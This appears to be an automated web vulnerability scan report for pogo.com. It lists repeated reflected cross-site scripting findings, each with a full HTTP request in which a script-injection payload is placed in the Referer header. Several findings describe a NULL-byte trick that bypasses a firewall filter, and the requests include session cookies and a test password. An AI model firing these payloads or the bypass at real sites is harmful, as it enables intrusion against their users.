Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536425818-New%7C1297128425818%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9393</script><script>alert(1)</script>9d11b28022caefc05 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd99d</script><script>alert(1)</script>c16bfc7e88aeee608 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3627</script><script>alert(1)</script>7d4bd838e4e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/verify-password.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a3627</script><script>alert(1)</script>7d4bd838e4e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536393024-New%7C1297128393024%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4dcc</script><script>alert(1)</script>48280d89769 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/confirmation.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a4dcc</script><script>alert(1)</script>48280d89769
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 743ee</script><script>alert(1)</script>ff787b7638f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/createAccount.do?pageSection=homnav_register HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=743ee</script><script>alert(1)</script>ff787b7638f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536332622-New%7C1297128332622%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936a3</script><script>alert(1)</script>e61f16ca4d92068c9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/lightreg.do?site=pogo&screenname=k7240&password=Dunno1&password_confirm=Dunno1&gender=F&birth_month=1&birth_day=1&birth_year=1970&country=US&email=test%40fastdial.net&lightreg_newword=0&wordverresponse=ckgwjx&accept=Accept HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=936a3</script><script>alert(1)</script>e61f16ca4d92068c9
Cache-Control: max-age=0
Origin: http://www.pogo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9e92</script><script>alert(1)</script>ea0af40b809 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/lightregview.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c9e92</script><script>alert(1)</script>ea0af40b809
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536332622-New%7C1297128332622%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65815</script><script>alert(1)</script>fc1dcdbed34 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_right_button HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: 65815</script><script>alert(1)</script>fc1dcdbed34
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536548428-New%7C1297128548428%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a6d4a</script>c47abe2abdf was submitted in the Referer HTTP header. This input was echoed as a6d4a</script>c47abe2abdf in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /all-games HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=%00a6d4a</script>c47abe2abdf
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a15ff</script><a>6209259dd1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /board-games?pageSection=footer_board HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=a15ff</script><a>6209259dd1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0015f3c</script><script>alert(1)</script>bb5b1d82243 was submitted in the Referer HTTP header. This input was echoed as 15f3c</script><script>alert(1)</script>bb5b1d82243 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /board-games?pageSection=categorybar_board HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=%0015f3c</script><script>alert(1)</script>bb5b1d82243
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea44</script><script>alert(1)</script>6b50ceea4b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c8dc</script><script>alert(1)</script>5714e91b8bb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/home.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4c8dc</script><script>alert(1)</script>5714e91b8bb
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c590</script><script>alert(1)</script>6d39ca2b1f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotdeploy/us/homepage/clubpogo-info.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=8c590</script><script>alert(1)</script>6d39ca2b1f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7be6</script><script>alert(1)</script>279ffb5215 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=c7be6</script><script>alert(1)</script>279ffb5215
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f536</script><script>alert(1)</script>b87bcf0ce7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=homnav_iphone HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
